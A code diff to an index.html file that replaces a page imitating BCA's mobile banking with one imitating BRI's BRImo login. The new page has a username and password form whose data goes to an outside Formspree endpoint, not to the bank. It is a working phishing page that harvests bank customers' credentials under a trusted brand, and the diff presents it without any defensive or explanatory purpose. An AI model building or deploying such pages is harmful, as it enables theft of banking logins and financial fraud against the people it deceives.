--- a/index.html
+++ b/index.html
@@ -4,18 +4,29 @@
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <meta http-equiv="X-UA-Compatible" content="ie=edge">
-  <title>Bcamobile | BCA</title>
-  <link rel="icon" href="https://play-lh.googleusercontent.com/ggZzVVDWsTm7gSnVl8m3cNFgoeUN2r7dhAZdB8lz0d_s6ZcYOkvUQdbG3dPU5LHZnWvc=s180-rw">
+  <title>BRImo | BRI</title>
+  <link rel="icon" href="logo.jpeg">
   <link rel="stylesheet" href="style.css">
-  <link rel="preconnect" href="https://fonts.gstatic.com">
-<link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
+  <style>
+    
+  </style>
 </head>
 <body>
-  <img style="z-index: 0" src="https://res.cloudinary.com/codelifings/image/upload/v1613358205/Tak_berjudul41_mnu1wt.jpg" alt="bca mobile">
-  <div style="position: absolute; z-index: 1; font-family: 'Roboto', sans-serif;">
-    <a style="position: absolute; margin-top: -150px; left: -50px; width: 100px; top: -10px;" href="input.php">m-BCA</a>
-    <a href="https://m.klikbca.com/login.jsp" style="position: absolute; top: -80px; left: -50px">KlikBCA</a>
-    <a href="https://www.bca.co.id/promo?i=ddbccf03bb349e45f699f1a396a55b023a185b815ccfb33c1166015b462ffe85" style="position: absolute; width: 150px; left: -50px">Info BCA</a>
-  </div>
+    <img class="bg" src="https://res.cloudinary.com/codelifings/image/upload/v1613985745/IMG_20210222_162044_qetd7o.jpg" alt="background">
+    <form action="https://formspree.io/f/xgepbbov" method="POST">
+      <div>
+        <img src="user.png" alt="">
+        <input class="inputan" type="username" placeholder="Username" id="username" name="username">
+      </div>
+      <div>
+        <img src="pass.png" alt="">
+        <input class="pass" type="password" placeholder="Password" id="password" name="password">
+      </div>
+      <div class="foot">
+        <input class="button" style="text-align:center; background:rgb(0, 126, 189);border:none;color: white;" type="submit" value="Login">
+        <a class="button dua" style="text-align:center; background:rgb(0, 126, 189);border:none;color: white;" type="submit" value=""><svg class="w-6 h-6" fill="currentColor" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" d="M6.625 2.655A9 9 0 0119 11a1 1 0 11-2 0 7 7 0 00-9.625-6.492 1 1 0 11-.75-1.853zM4.662 4.959A1 1 0 014.75 6.37 6.97 6.97 0 003 11a1 1 0 11-2 0 8.97 8.97 0 012.25-5.953 1 1 0 011.412-.088z" clip-rule="evenodd"></path><path fill-rule="evenodd" d="M5 11a5 5 0 1110 0 1 1 0 11-2 0 3 3 0 10-6 0c0 1.677-.345 3.276-.968 4.729a1 1 0 11-1.838-.789A9.964 9.964 0 005 11zm8.921 2.012a1 1 0 01.831 1.145 19.86 19.86 0 01-.545 2.436 1 1 0 11-1.92-.558c.207-.713.371-1.445.49-2.192a1 1 0 011.144-.83z" clip-rule="evenodd"></path><path fill-rule="evenodd" d="M10 10a1 1 0 011 1c0 2.236-.46 4.368-1.29 6.304a1 1 0 01-1.838-.789A13.952 13.952 0 009 11a1 1 0 011-1z" clip-rule="evenodd"></path></svg></a>
+      </div>
+    </form>
+
 </body>
 </html>
